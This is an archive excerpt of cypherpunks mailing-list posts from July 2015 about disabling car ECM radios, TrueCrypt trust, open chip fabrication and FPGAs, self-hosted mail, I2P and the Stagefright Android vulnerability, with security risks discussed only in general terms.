<270760644.2684776.1437872772106.JavaMail.yahoo@mail.yahoo.com> <55B56493.7020603@pilobilus.net> Message-ID: > Need some volunteers and/or a funding angel to create a corpus of > howto docs that identify the RF receiver parts in automotive ECM > units and their associated wiring harnesses, including which pins > to cut to assure radio silence in both directions. 
> I'm reading this discussion with some amusement because I wrote off car > ownership and being a 'motorhead' a decade or more ago when the cars > wouldn't let you tune them up correctly b/c 'computer'. > ECM units are fairly well RF isolated, so those that > talk to the world should normally have easily identified > connections to external antennas. > Junk yards pull ECMs and sell them back to their manufacturers Vehicles have intrinsic baseline performance / emissions / operation they are capable of. Computers with sensors are just there to tweak things and tell you when it's broken. You could just as easily watch what those systems are sensing and actuating under various conditions, duplicate the control in your own FPGA/PIC/etc, then rip out the factory system and put in your own. Getting a motor to run or pass EPA isn't that hard... spend some time learn2motorheading on youtube. cpu, rom, flash, io, control, antenna, logging are increasingly being embedded under a single chip epoxy cap. Fewer leads to cut when the only leads left are io to sensors, actuators and power. If antennas become embedded there's always Faraday. Cut the service io ports. Internal logging would still require destruction. Manufacturers don't need used ECM's, the ECM rebuild / repair / replacement aftermarket does. > codermange who love his '67 Chevy C20 long bed farm truck more each day :) Word. If you livin in some place that has EPA checks, newfangled Hyundai's, and more pavement and sewers than pasture and streams... you aint country. From s at ctrlc.hu Tue Jul 28 07:47:34 2015 From: s at ctrlc.hu (stef) Date: Tue, 28 Jul 2015 16:47:34 +0200 Subject: another google nugget In-Reply-To: <1438094632.21834.1.camel@moonpatrol> References: <55b74802.c7628c0a.349b.ffff9e4b@mx.google.com> <20150728110953.GA2524@sivokote.iziade.m$> <1438094632.21834.1.camel@moonpatrol> Message-ID: <20150728144734.GM6906@ctrlc.hu> On Tue, Jul 28, 2015 at 09:43:52AM -0500, Shawn K. 
Quinn wrote: > On Tue, 2015-07-28 at 08:01 -0400, swalow swalow wrote: > > Beginner question: > > What are the alternatives? > > Fastmail, for one, though it does cost. I would imagine riseup.net is > also an option for some. is this mailinglist suddenly transformed to the libtech list? cypherpunks i believe build their own infrastructure, they work on remailers, and other related stuff. what the hell happened? can someone foia what the codeword for operation "disrupt cypherpunks mailinglist" is? the mind boggles. -- otr fp: https://www.ctrlc.hu/~stef/otr.txt From grarpamp at gmail.com Tue Jul 28 14:04:38 2015 From: grarpamp at gmail.com (grarpamp) Date: Tue, 28 Jul 2015 17:04:38 -0400 Subject: True Crypt is Not Secure In-Reply-To: <1437752365-sup-6750@metis.syd1.tesser.org> References: <1437752365-sup-6750@metis.syd1.tesser.org> Message-ID: > TrueCrypt has been audited[0] and come through relatively unscathed; > I'd trust it over a Microsoft product I'd need to disassemble to > examine any day. You may trust your opensource code but would still need to disassemble and audit any critical and closed windows libs and system interfaces you compile against, let alone run in / under. This is the trouble with closed platforms. You have some luck with open unix, but the luck buck currently stops at the iron and the hardware is getting worse. And we don't have any open fabs on the horizon to solve it. This is BAD. From zen at freedbms.net Tue Jul 28 11:29:30 2015 From: zen at freedbms.net (Zenaan Harkness) Date: Tue, 28 Jul 2015 18:29:30 +0000 Subject: another google nugget In-Reply-To: References: <55b74802.c7628c0a.349b.ffff9e4b@mx.google.com> <20150728110953.GA2524@sivokote.iziade.m$> <1438094632.21834.1.camel@moonpatrol> <20150728144734.GM6906@ctrlc.hu> Message-ID: On 7/28/15, bbrewer wrote: >> On Jul 28, 2015, at 10:47 AM, stef wrote: >> is this mailinglist suddenly transformed to the libtech list? 
cypherpunks >> i >> believe build their own infrastructure, they work on remailers, and other >> related stuff. what the hell happened? can someone foia what the codeword >> for >> operation "disrupt cypherpunks mailinglist" is? >> >> the mind boggles. > > I wanted to hit the ‘like’ button on this, but I couldn’t find it. My > internet must be broken. Sorry I downloaded the Internet the other day - forgot to upload it again. Gimme 5. From grarpamp at gmail.com Tue Jul 28 18:27:44 2015 From: grarpamp at gmail.com (grarpamp) Date: Tue, 28 Jul 2015 21:27:44 -0400 Subject: Open Fabs Message-ID: On Tue, Jul 28, 2015 at 8:15 PM, jim bell wrote: > From: Seth > On Tue, 28 Jul 2015 15:40:55 -0700, oshwm wrote: >> >>> So is anyone working on building an 'openfab' or is it such a big task >>> that everyone just backs away in horror? :D Of course you're going to fail if you keep saying no and FUDding yourself. Is anyone building "cars" or is it such a big task that... http://www.teslamotors.com/ >>My understanding is that the capital costs involved with building and >>operating a chip fabrication plant are astronomical, although the >>situation may be getting better. > >>http://spectrum.ieee.org/semiconductors/design/the-new-economics-of-semiconductor-manufacturing Competition, so what? Leech what's been done before you. > Even 30 years ago, there were custom fabs that were designed to allow small > organizations to get chips fabbed. This may be one of the modern version of > them: http://www.globalfoundries.com/manufacturing/manufacturing-overview You don't need a $50B 1Msqft setup to start making chips, you need a floor in a warehouse and some people who believe. > In the mid 80's, they typically purchased older fabs (not state of the art) > and allowed small companies to prototype their semiconductor designs. > Today, some of them apparently do near-state-of-the-art production. Universities have always had fabs too.
The cost to get a basic line going at some tech level is not prohibitive, it's an adventure. Open is your differentiator and your ROI, even private runs will come paying to you because they know your ground up construction and monitored production process can't inject warez in their silicon. Can you as a reasonably learned hobbyist go observe an Intel run through GloFab from start to finish? What about for the chip inside your phone? Your makerbot? Your RPi? Your USRP? Your own mask? No? Well... that's a problem. From admin at pilobilus.net Tue Jul 28 18:34:07 2015 From: admin at pilobilus.net (Steve Kinney) Date: Tue, 28 Jul 2015 21:34:07 -0400 Subject: True Crypt is Not Secure In-Reply-To: References: <1437752365-sup-6750@metis.syd1.tesser.org> <0B5F8A86-54B3-4393-AE95-3022BFA7CC53@openmailbox.org> Message-ID: <55B82D8F.3030907@pilobilus.net> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On 07/28/2015 07:22 PM, Seth wrote: > On Tue, 28 Jul 2015 15:40:55 -0700, oshwm > wrote: > >> So is anyone working on building an 'openfab' or is it such >> a big task that everyone just backs away in horror? :D > > My understanding is that the capital costs involved with > building and operating a chip fabrication plant are > astronomical, although the situation may be getting better. > [1] > > [1] > http://spectrum.ieee.org/semiconductors/design/the-new-economics-of-semiconductor-manufacturing If a market is willing to pay enough to support and grow the project, it can be done. Are there potential partners and large scale consumers for "top security through total transparency" to make an open hardware project viable today? One potential route would be to broker a deal to pool the resources of specialty hardware integrators who already have a market base for high security "solutions." The Open Office project pulled off something similar years ago, obtaining major funding and support from IBM and others who wanted Microsoft out of their hair.
So, who wants a shot at defending some of their digital assets from outfits like NSA and GHCQ, badly enough to pay for it? The first place I would start shopping this "crypto anarchist" project around would be State security services - pretty much any small to mid-sized outfit not in BRICS or FVEYE could be a potential market for auditable scrambler phones for military commanders, senior elected officials, diplomatic corps and double-nought spies. From there to high performance servers and workstations would be a natural progression. I haven't looked at how the Black Phone folks are doing lately, but that looks like the kind of product line where open hardware might find its first viable home. Another consideration: One needs not necessarily own the facility where the chips are made: ISO quality assurance programs already in place support client access for audit and validation. A contract that specifies the client's intrusive presence during every phase of production and handling would cost extra, but a QA process that assumes the presence of hostile actors on the shop floor is definitely possible. Such a process would also be needed at a dedicated facility: One must assume the presence of hostile actors there, too. 
:o) Steve From grarpamp at gmail.com Tue Jul 28 18:55:41 2015 From: grarpamp at gmail.com (grarpamp) Date: Tue, 28 Jul 2015 21:55:41 -0400 Subject: SIGINT and improving wireless privacy at the PHY In-Reply-To: References: Message-ID: On Mon, Jul 27, 2015 at 11:21 AM, wrote: > Probably the result of DDoS and other exploit attacks against the site. > >> >> same from some random tor exitnode. the ops seem to hate freedom or at least >> anon visitors >> otr fp: https://www.ctrlc.hu/~stef/otr.txt Because Tor is so very capable of ddos, and hackers are so incapable of securing their own sites. Ops like typical wan interface logwatching handwavers. Want to be random, put your site on the darknets. From grarpamp at gmail.com Tue Jul 28 19:20:41 2015 From: grarpamp at gmail.com (grarpamp) Date: Tue, 28 Jul 2015 22:20:41 -0400 Subject: Open Fabs In-Reply-To: References: Message-ID: > Steve Kinney wrote: > If a market is willing to pay enough to support and grow the > project, it can be done. Are there potential partners and large > scale consumers for "top security through total transparency" to > make an open hardware project viable today?
> > One potential route would be to broker a deal to pool the > resources of specialty hardware integrators who already have a > market base for high security "solutions." The Open Office > project pulled off something similar years ago, obtaining major > funding and support from IBM and others who wanted Microsoft out > of their hair. So, who wants a shot at defending some of their > digital assets from outfits like NSA and GHCQ, badly enough to pay > for it? > > The first place I would start shopping this "crypto anarchist" > project around would be State security services - pretty much any > small to mid-sized outfit not in BRICS or FVEYE could be a > potential market for auditable scrambler phones for military > commanders, senior elected officials, diplomatic corps and > double-nought spies. From there to high performance servers and > workstations would be a natural progression. > > I haven't looked at how the Black Phone folks are doing lately, > but that looks like the kind of product line where open hardware > might find its first viable home. > > Another consideration: One needs not necessarily own the facility > where the chips are made: ISO quality assurance programs already > in place support client access for audit and validation. A > contract that specifies the client's intrusive presence during > every phase of production and handling would cost extra, but a QA > process that assumes the presence of hostile actors on the shop > floor is definitely possible. Such a process would also be needed > at a dedicated facility: One must assume the presence of hostile > actors there, too. :o) That's basically all part of the idea. And that some serious multi philosophical combination of hardcore Stallman Ghandi Cpunk Riseup Coder Maker Opensource Auditor like motherfuckers all build, run and observe the joint from the ground up as essentially a crosschecked incorruptible thing that anyone can look at. 
Today's shops are a mutable system of hierarchical employee paychecks, payoffs, closed door privacy and backroom games. From rysiek at hackerspace.pl Tue Jul 28 14:09:03 2015 From: rysiek at hackerspace.pl (rysiek) Date: Tue, 28 Jul 2015 23:09:03 +0200 Subject: another google nugget In-Reply-To: <20150728122446.GL6906@ctrlc.hu> References: <55b74802.c7628c0a.349b.ffff9e4b@mx.google.com> <20150728122446.GL6906@ctrlc.hu> Message-ID: <2844904.zZGGaKtjBA@lapuntu> On Tuesday, 28 July 2015 14:24:46 stef wrote: > On Tue, Jul 28, 2015 at 08:01:00AM -0400, swalow swalow wrote: > > Beginner question: > > What are the alternatives? > > hosting your own??? > jeez. And once you do that, also let a few friends in, so that people without the m4d sk1llz required to configure a mailserver and stay off of spamlists also have the opportunity to get off of gfail. ;) -- Regards, Michał "rysiek" Woźniak I'm changing my GPG key :: http://rys.io/pl/147 GPG Key Transition :: http://rys.io/en/147 From oshwm at openmailbox.org Tue Jul 28 15:40:55 2015 From: oshwm at openmailbox.org (oshwm) Date: Tue, 28 Jul 2015 23:40:55 +0100 Subject: True Crypt is Not Secure In-Reply-To: References: <1437752365-sup-6750@metis.syd1.tesser.org> Message-ID: <0B5F8A86-54B3-4393-AE95-3022BFA7CC53@openmailbox.org> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 So is anyone working on building an 'openfab' or is it such a big task that everyone just backs away in horror? :D On 28 July 2015 22:04:38 BST, grarpamp wrote: >> TrueCrypt has been audited[0] and come through relatively unscathed; >> I'd trust it over a Microsoft product I'd need to disassemble to >> examine any day.
> >You may trust your opensource code but would still need to >disassemble and audit any critical and closed windows libs and >system interfaces you compile against, let alone run in / under. >This is the trouble with closed platforms. You have some luck >with open unix, but the luck buck currently stops at the iron and >the hardware is getting worse. And we don't have any open fabs on >the horizon to solve it. This is BAD. From jdb10987 at yahoo.com Tue Jul 28 17:15:25 2015 From: jdb10987 at yahoo.com (jim bell) Date: Wed, 29 Jul 2015 00:15:25 +0000 (UTC) Subject: True Crypt is Not Secure In-Reply-To: References: Message-ID: <1992332927.4568274.1438128925995.JavaMail.yahoo@mail.yahoo.com> From: Seth On Tue, 28 Jul 2015 15:40:55 -0700, oshwm wrote: >> -----BEGIN PGP SIGNED MESSAGE----- >> Hash: SHA512 > >> So is anyone working on building an 'openfab' or is it such a big task >> that everyone just backs away in horror? :D >My understanding is that the capital costs involved with building and >operating a chip fabrication plant are astronomical, although the >situation may be getting better.
>http://spectrum.ieee.org/semiconductors/design/the-new-economics-of-semiconductor-manufacturing Even 30 years ago, there were custom fabs that were designed to allow small organizations to get chips fabbed. This may be one of the modern version of them: http://www.globalfoundries.com/manufacturing/manufacturing-overview In the mid 80's, they typically purchased older fabs (not state of the art) and allowed small companies to prototype their semiconductor designs. Today, some of them apparently do near-state-of-the-art production. Jim Bell From seanl at literati.org Tue Jul 28 20:17:03 2015 From: seanl at literati.org (Sean Lynch) Date: Wed, 29 Jul 2015 03:17:03 +0000 Subject: Open Fabs In-Reply-To: References: Message-ID: If you're willing to sacrifice some performance and power efficiency, you can always use an FPGA. The tools aren't open, but it seems like it would be a lot harder to make an FPGA or FPGA tools to backdoor arbitrary circuits. You could potentially do the "reflections on trusting trust" thing and detect and backdoor each of the major open source processor cores, but it seems pretty unlikely that such a thing wouldn't leak. On the other hand, I also seriously doubt Intel CPUs are backdoored, so maybe my paranoia isn't properly calibrated. Even if you generally trust Intel, though, FPGAs could still potentially protect you from all the investment the NSA has undoubtedly put into finding bugs and side channels in the widely used CPUs, though. And being much simpler, something like OpenRisc or J1 or SPARC v8 probably has far fewer places for such flaws/side channels to hide.
On the gripping hand, none of those processors gives you an equivalent of Intel's TXT mode, and I'm not sure but it's probably much easier to dump internal state from an FPGA, so you could be more vulnerable to cold boot and evil maid attacks. On Tue, Jul 28, 2015, 19:27 grarpamp wrote: > > Steve Kinney wrote: > > If a market is willing to pay enough to support and grow the > > project, it can be done. Are there potential partners and large > > scale consumers for "top security through total transparency" to > > make an open hardware project viable today? > > > > One potential route would be to broker a deal to pool the > > resources of specialty hardware integrators who already have a > > market base for high security "solutions." The Open Office > > project pulled off something similar years ago, obtaining major > > funding and support from IBM and others who wanted Microsoft out > > of their hair. So, who wants a shot at defending some of their > > digital assets from outfits like NSA and GHCQ, badly enough to pay > > for it? > > > > The first place I would start shopping this "crypto anarchist" > > project around would be State security services - pretty much any > > small to mid-sized outfit not in BRICS or FVEYE could be a > > potential market for auditable scrambler phones for military > > commanders, senior elected officials, diplomatic corps and > > double-nought spies. From there to high performance servers and > > workstations would be a natural progression. > > > > I haven't looked at how the Black Phone folks are doing lately, > > but that looks like the kind of product line where open hardware > > might find its first viable home. > > > > Another consideration: One needs not necessarily own the facility > > where the chips are made: ISO quality assurance programs already > > in place support client access for audit and validation. 
A > > contract that specifies the client's intrusive presence during > > every phase of production and handling would cost extra, but a QA > > process that assumes the presence of hostile actors on the shop > > floor is definitely possible. Such a process would also be needed > > at a dedicated facility: One must assume the presence of hostile > > actors there, too. :o) > > That's basically all part of the idea. And that some serious multi > philosophical combination of hardcore Stallman Ghandi Cpunk > Riseup Coder Maker Opensource Auditor like motherfuckers all > build, run and observe the joint from the ground up as essentially a > crosschecked incorruptible thing that anyone can look at. > > Today's shops are a mutable system of hierarchical employee > paychecks, payoffs, closed door privacy and backroom games. From wirelesswarrior at safe-mail.net Wed Jul 29 00:42:48 2015 From: wirelesswarrior at safe-mail.net (wirelesswarrior at safe-mail.net) Date: Wed, 29 Jul 2015 03:42:48 -0400 Subject: Open Fabs Message-ID: For CPunks what's needed is a DIY Electron Beam Litho apparatus. It's basically an electron microscope in reverse. For relatively simple chips it could be more than adequate as it possibly eliminates the need and complexity, chemistry, etc. for masks and can perform most all process functions (doping, implantation, etc.) and attain feature sizes commensurate with current foundry tech. AFAIK, it's possible to build from used e-microscopes though maintaining calibration and linearity is something best learned in a working environment at someone else's expense. :) One of the main shortcomings of EBL is its low production rate since all features must be developed by "writing" them, like an old-style vector display, on the substrate.
-------- Original Message -------- From: grarpamp Apparently from: cypherpunks-bounces at cpunks.org To: "cypherpunks at cpunks.org" Subject: Re: Open Fabs Date: Tue, 28 Jul 2015 22:20:41 -0400 > > Steve Kinney wrote: > > If a market is willing to pay enough to support and grow the > > project, it can be done. Are there potential partners and large > > scale consumers for "top security through total transparency" to > > make an open hardware project viable today? > > > > One potential route would be to broker a deal to pool the > > resources of specialty hardware integrators who already have a > > market base for high security "solutions." The Open Office > > project pulled off something similar years ago, obtaining major > > funding and support from IBM and others who wanted Microsoft out > > of their hair. So, who wants a shot at defending some of their > > digital assets from outfits like NSA and GHCQ, badly enough to pay > > for it? > > > > The first place I would start shopping this "crypto anarchist" > > project around would be State security services - pretty much any > > small to mid-sized outfit not in BRICS or FVEYE could be a > > potential market for auditable scrambler phones for military > > commanders, senior elected officials, diplomatic corps and > > double-nought spies. From there to high performance servers and > > workstations would be a natural progression. > > > > I haven't looked at how the Black Phone folks are doing lately, > > but that looks like the kind of product line where open hardware > > might find its first viable home. > > > > Another consideration: One needs not necessarily own the facility > > where the chips are made: ISO quality assurance programs already > > in place support client access for audit and validation. 
A > > contract that specifies the client's intrusive presence during > > every phase of production and handling would cost extra, but a QA > > process that assumes the presence of hostile actors on the shop > > floor is definitely possible. Such a process would also be needed > > at a dedicated facility: One must assume the presence of hostile > > actors there, too. :o) > > That's basically all part of the idea. And that some serious multi > philosophical combination of hardcore Stallman Gandhi Cpunk > Riseup Coder Maker Opensource Auditor like motherfuckers all > build, run and observe the joint from the ground up as essentially a > crosschecked incorruptible thing that anyone can look at. > > Today's shops are a mutable system of hierarchical employee > paychecks, payoffs, closed door privacy and backroom games. From grarpamp at gmail.com Wed Jul 29 01:44:46 2015 From: grarpamp at gmail.com (grarpamp) Date: Wed, 29 Jul 2015 04:44:46 -0400 Subject: Open Fabs In-Reply-To: References: Message-ID: On Tue, Jul 28, 2015 at 11:17 PM, Sean Lynch wrote: > On the other hand, I also seriously doubt Intel CPUs are backdoored Even if they're not physically backdoored with handy extra gates, they seem logically backdoorable by demanding the signing keys needed for loading microcode (Intel/AMD) and AMT firmware (Intel, don't plug your "LM" series NIC into the WAN.) http://inertiawar.com/microcode/ https://wiki.archlinux.org/index.php/Microcode https://en.wikipedia.org/wiki/Intel_Active_Management_Technology http://invisiblethingslab.com/resources/bh09dc/Attacking%20Intel%20TXT%20-%20paper.pdf http://invisiblethingslab.com/resources/bh09dc/Attacking%20Intel%20TXT%20-%20slides.pdf From sdw at lig.net Wed Jul 29 07:06:40 2015 From: sdw at lig.net (Stephen D.
Williams) Date: Wed, 29 Jul 2015 07:06:40 -0700 Subject: another google nugget In-Reply-To: References: <55b74802.c7628c0a.349b.ffff9e4b@mx.google.com> <20150728110953.GA2524@sivokote.iziade.m$> <1438094632.21834.1.camel@moonpatrol> <20150728144734.GM6906@ctrlc.hu> Message-ID: <55B8DDF0.5090402@lig.net> On 7/28/15 8:21 AM, bbrewer wrote: >> On Jul 28, 2015, at 10:47 AM, stef wrote: >> >> is this mailinglist suddenly transformed to the libtech list? cypherpunks i >> believe build their own infrastructure, they work on remailers, and other >> related stuff. what the hell happened? can someone foia what the codeword for >> operation "disrupt cypherpunks mailinglist" is? >> >> the mind boggles. > I wanted to hit the ‘like’ button on this, but I couldn’t find it. My internet must be broken. You do it like this: The original 'Like': +1 And then everyone is supposed to notice and mentally tabulate the results. Or your mail reader could track posts and do it for you, but nobody ever did that. > > (I will agree hosting your own could be the way to go, however, running/admining your own box at home / work or hosted on a VPS each carry with them their own dangers of security, trust, yadda yadda). I've run my own box on the Internet continuously since 1992. But there is a payment history, it's been in the same location for 8 years, etc. When I imagine a more secure (in certain senses) alternative, as least as an individual, it usually involves public cloud services, perhaps in some ephemeral rotating basis way. First you need to secure DNS, or some similar alternative, then... Tor or similar helps for a certain class of usage, but then you're outside the normal Internet world. Without interesting goals, no point in interesting solutions other than knowing how to do interesting solutions and what their limitations are. Which is a good thing in and of itself. > > There is, as you state, a large difference between acknowledging these other options and their upsides/downsides, vs. 
simply not acknowledging their existence at all. > > Depressing. > sdw From list at sysfu.com Wed Jul 29 07:28:44 2015 From: list at sysfu.com (Seth) Date: Wed, 29 Jul 2015 07:28:44 -0700 Subject: first annual I2Pcon in Toronto August 15-16 #I2PCon #I2PToronto Message-ID: I2P Meetup Hacklab.to Saturday, 15 August 2015 at 2:00 PM - Sunday, 16 August 2015 at 11:30 PM (EDT) Toronto, Ontario https://www.eventbrite.ca/e/i2p-meetup-tickets-17773984466 I should also mention that I2P's budget contains 0% government funding. https://twitter.com/GetI2P/status/583731852504133633 If you have long term concerns (like me) about the Tor project's funded-by-the-adversary-slopping-at-the-government-blood-money-trough funding model, maybe you can (like me) put your money where your mouth is and kick some Bitcoin down to a mixnet privacy project that does suffer from this compromise. From jdb10987 at yahoo.com Wed Jul 29 01:48:58 2015 From: jdb10987 at yahoo.com (jim bell) Date: Wed, 29 Jul 2015 08:48:58 +0000 (UTC) Subject: "Stagefright" text attack to Android. Message-ID: <1666375987.4877635.1438159738041.JavaMail.yahoo@mail.yahoo.com> http://www.theinquirer.net/inquirer/news/2419531/text-based-android-stagefright-attack-is-bad-news-for-950-million-users "A MOBILE SECURITY RESEARCHER has done his work and found a cluster of vulnerabilities in Android that, when combined, present a problem for 95 percent of the user base. This is bad stuff. Despite references to unicorns in the official information, there is also some goosebump-inducing wordplay. The official warning is that almost anyone with an Android mobile phone can be sent one text message and be plunged into security chaos. This threat package has been dubbed Stagefright by Joshua Drake from the security outfit Zimperium zLabs.
"Gaining remote code execution privileges merely by having access to the mobile number? Enter Stagefright. The targets for this kind of attack can be anyone from prime ministers, government officials, company executives, security officers to IT managers," said the firm in a blog post. "[We] dived into the deepest corners of Android code and discovered what we believe to be the worst Android vulnerabilities discovered to date. These issues in Stagefright code critically expose 95 percent of Android devices, an estimated 950 million devices." If this does not have you standing on a chair pushing your phone away with a broomstick, then get ready for this. Zimperium said that Stagefright is worse than Heartbleed - and we all know how that worked out." From zen at freedbms.net Wed Jul 29 02:27:53 2015 From: zen at freedbms.net (Zenaan Harkness) Date: Wed, 29 Jul 2015 09:27:53 +0000 Subject: Open Fabs In-Reply-To: References: Message-ID: On 7/29/15, wirelesswarrior at safe-mail.net wrote: > For CPunks what's needed is a DIY Electron Beam Litho apparatus. Its > basically an electron microscope in reverse. For relatively simple chips it > could be more than adequate as its possible eliminates the need and > complexity, chemistry, etc. for masks and can perform most all process > functions (doping, implantation, etc.) and attain feature sizes commensurate > with current foundary tech. AFAIK, its possible to build from used > e-microscopes though maintaining calibration and linarity is something best > learned in a working environment at someone else's expense. :) One of the > main shortcomings of EBL is its low production rate since all features must > be developed by "writing" them, like an old stylevector display, on the > substrate. Whereas with "photon lithography" (terminology?) a light source covers an area (of the mask?) which is then lens-focused down to the appropriate scale (eg 24nm) onto the silicon and etc physical layer? 
Firstly is this minimal understanding correct? Secondly is there any potential areal electron emission device (as opposed to point electron emission device) comparable to current litho tech (areal photon emission)? From drwho at virtadpt.net Wed Jul 29 09:52:23 2015 From: drwho at virtadpt.net (The Doctor) Date: Wed, 29 Jul 2015 09:52:23 -0700 Subject: True Crypt is Not Secure In-Reply-To: <0B5F8A86-54B3-4393-AE95-3022BFA7CC53@openmailbox.org> References: <1437752365-sup-6750@metis.syd1.tesser.org> <0B5F8A86-54B3-4393-AE95-3022BFA7CC53@openmailbox.org> Message-ID: <55B904C7.3050604@virtadpt.net> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 On 07/28/2015 03:40 PM, oshwm wrote: > So is anyone working on building an 'openfab' or is it such a big > task that everyone just backs away in horror? :D The closest I know to that is Jeri Ellsworth, who's at the point of fabbing her own discrete transistors in a homebrew semiconductor foundry. If she's still working on this project, she's probably a bit closer but I haven't spoken to her about it. - -- The Doctor [412/724/301/703/415] [ZS] PGP: 0x807B17C1 / 7960 1CDC 85C9 0B63 8D9F DD89 3BD8 FF2B 807B 17C1 WWW: https://drwho.virtadpt.net/ "Pills for breakfast. I'm so science fictional." 
--Doktor Sleepless -----BEGIN PGP SIGNATURE----- -----END PGP SIGNATURE----- From drwho at virtadpt.net Wed Jul 29 09:54:39 2015 From: drwho at virtadpt.net (The Doctor) Date: Wed, 29 Jul 2015 09:54:39 -0700 Subject: Open Fabs In-Reply-To: References: Message-ID: <55B9054F.7010908@virtadpt.net> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 On 07/28/2015 06:27 PM, grarpamp wrote: > Universities have always had fabs too. The Rochester Institute of Technology should still have theirs online. Fun times. > Can you as a reasonably learned hobbyist go observe an Intel run > through GloFab from start to finish? What about for the chip > inside your phone? Your makerbot? Your RPi? Your USRP? Your own > mask? No? Well... that's a problem. Open designs that operate much the same way are going to take a while to get up to par, too. There are good FPGA designs, but then the "open gate synthesis" holy wars kick into high gear. Anybody got any popcorn? I'm out. - -- The Doctor [412/724/301/703/415] [ZS] PGP: 0x807B17C1 / 7960 1CDC 85C9 0B63 8D9F DD89 3BD8 FF2B 807B 17C1 WWW: https://drwho.virtadpt.net/ "Pills for breakfast. I'm so science fictional."
--Doktor Sleepless -----BEGIN PGP SIGNATURE----- -----END PGP SIGNATURE----- From drwho at virtadpt.net Wed Jul 29 09:58:54 2015 From: drwho at virtadpt.net (The Doctor) Date: Wed, 29 Jul 2015 09:58:54 -0700 Subject: Open Fabs In-Reply-To: References: Message-ID: <55B9064E.5010903@virtadpt.net> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 On 07/28/2015 08:17 PM, Sean Lynch wrote: > of Intel's TXT mode, and I'm not sure but it's probably much easier > to dump internal state from an FPGA, so you could be more > vulnerable to cold boot and evil maid attacks. More likely, dump the contents of the EPROM some FPGAs read their gate matrices out of when they power up. - -- The Doctor [412/724/301/703/415] [ZS] PGP: 0x807B17C1 / 7960 1CDC 85C9 0B63 8D9F DD89 3BD8 FF2B 807B 17C1 WWW: https://drwho.virtadpt.net/ "Pills for breakfast. I'm so science fictional."
--Doktor Sleepless -----BEGIN PGP SIGNATURE----- -----END PGP SIGNATURE----- From rysiek at hackerspace.pl Wed Jul 29 01:20:16 2015 From: rysiek at hackerspace.pl (rysiek) Date: Wed, 29 Jul 2015 10:20:16 +0200 Subject: True Crypt is Not Secure In-Reply-To: <55B82D8F.3030907@pilobilus.net> References: <55B82D8F.3030907@pilobilus.net> Message-ID: <1627812.qLORAD9xv3@lapuntu> On Tuesday, 28 July 2015 21:34:07 Steve Kinney wrote: > If a market is willing to pay enough to support and grow the > project, it can be done. Are there potential partners and large > scale consumers for "top security through total transparency" to > make an open hardware project viable today? Yes. And there are ways to create a market like that, albeit it takes time. > (...) > I haven't looked at how the Black Phone folks are doing lately, > but that looks like the kind of product line where open hardware > might find its first viable home.
Funny you should ask: http://www.theinquirer.net/inquirer/news/2402536/us-department-of-defence-adopts-nsa-proof-blackphone-devices :) -- Regards, Michał "rysiek" Woźniak I am changing my GPG key :: http://rys.io/pl/147 GPG Key Transition :: http://rys.io/en/147 From rysiek at hackerspace.pl Wed Jul 29 01:24:34 2015 From: rysiek at hackerspace.pl (rysiek) Date: Wed, 29 Jul 2015 10:24:34 +0200 Subject: Open Fabs In-Reply-To: References: Message-ID: <3362957.fvfkYIsBzA@lapuntu> On Tuesday, 28 July 2015 21:27:44 grarpamp wrote: > You don't need a $50B 1Msqft setup to start making chips, you need > a floor in a warehouse and some people who believe. Testify, brother! -- Regards, Michał "rysiek" Woźniak I am changing my GPG key :: http://rys.io/pl/147 GPG Key Transition :: http://rys.io/en/147 From s at ctrlc.hu Wed Jul 29 01:52:00 2015 From: s at ctrlc.hu (stef) Date: Wed, 29 Jul 2015 10:52:00 +0200 Subject: Open Fabs In-Reply-To: References: Message-ID: <20150729085200.GP6906@ctrlc.hu> On Wed, Jul 29, 2015 at 03:17:03AM +0000, Sean Lynch wrote: > If you're willing to sacrifice some performance and power efficiency, you > can always use an FPGA. The tools aren't open, but it seems like it would check out icestorm for a counterexample. and a simple cpu implemented on it: http://www.excamera.com/sphinx/article-j1a-swapforth.html > On the other hand, I also seriously doubt Intel CPUs are backdoored, so it's called bugdoor. if they backdoor your system with ME crap, why would they stop at the core?
-- otr fp: https://www.ctrlc.hu/~stef/otr.txt From drwho at virtadpt.net Wed Jul 29 11:33:29 2015 From: drwho at virtadpt.net (The Doctor) Date: Wed, 29 Jul 2015 11:33:29 -0700 Subject: Open Fabs In-Reply-To: <20150729180714.GA2509@antiproton.jfet.org> References: <55B9064E.5010903@virtadpt.net> <20150729180714.GA2509@antiproton.jfet.org> Message-ID: <55B91C79.8010203@virtadpt.net> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 On 07/29/2015 11:07 AM, Riad S. Wahby wrote: > But that just gives away the bitstream describing the FPGA > configuration (say, a trusted CPU). Is the CPU's *design* a secret? > If Gate matrices can be reversed (as mentioned earlier). > not, I don't see why it matters that an evil cleaner might read out > the FPGA's configuration. (Obviously, don't store secret keys in > there!) I thought the point being made in the conversation was (and correct me if I'm wrong) that one could dump an arbitrary FPGA's contents to do a security audit on them. Not to say that you're wrong, you make a good point, but it's taking the discussion in a different direction. > If we really are worried about keeping the CPU's design a secret, > it's We were talking about open CPU designs, so why keep them a secret? > possible with many FPGAs to encrypt the configuration bitstream > such that the configuration is decrypted onboard the FPGA at > power-on. This Yeah. It's pretty cool, isn't it? > is intended to handle the case where I want to sell a product that > uses an FPGA without revealing the contents of that FPGA's > configuration to my customers or competitors. That's a few degrees off-center from where the discussion was going, but go ahead. We'll fork() as necessary. > Cue the OTP / epoxy / physical security arms race, I guess. Or the electromechanical processing rigs that a few people have been bringing up over beer lately. Cool idea, but I strongly doubt that they'll scale, or even keep up with the watch on my wrist. 
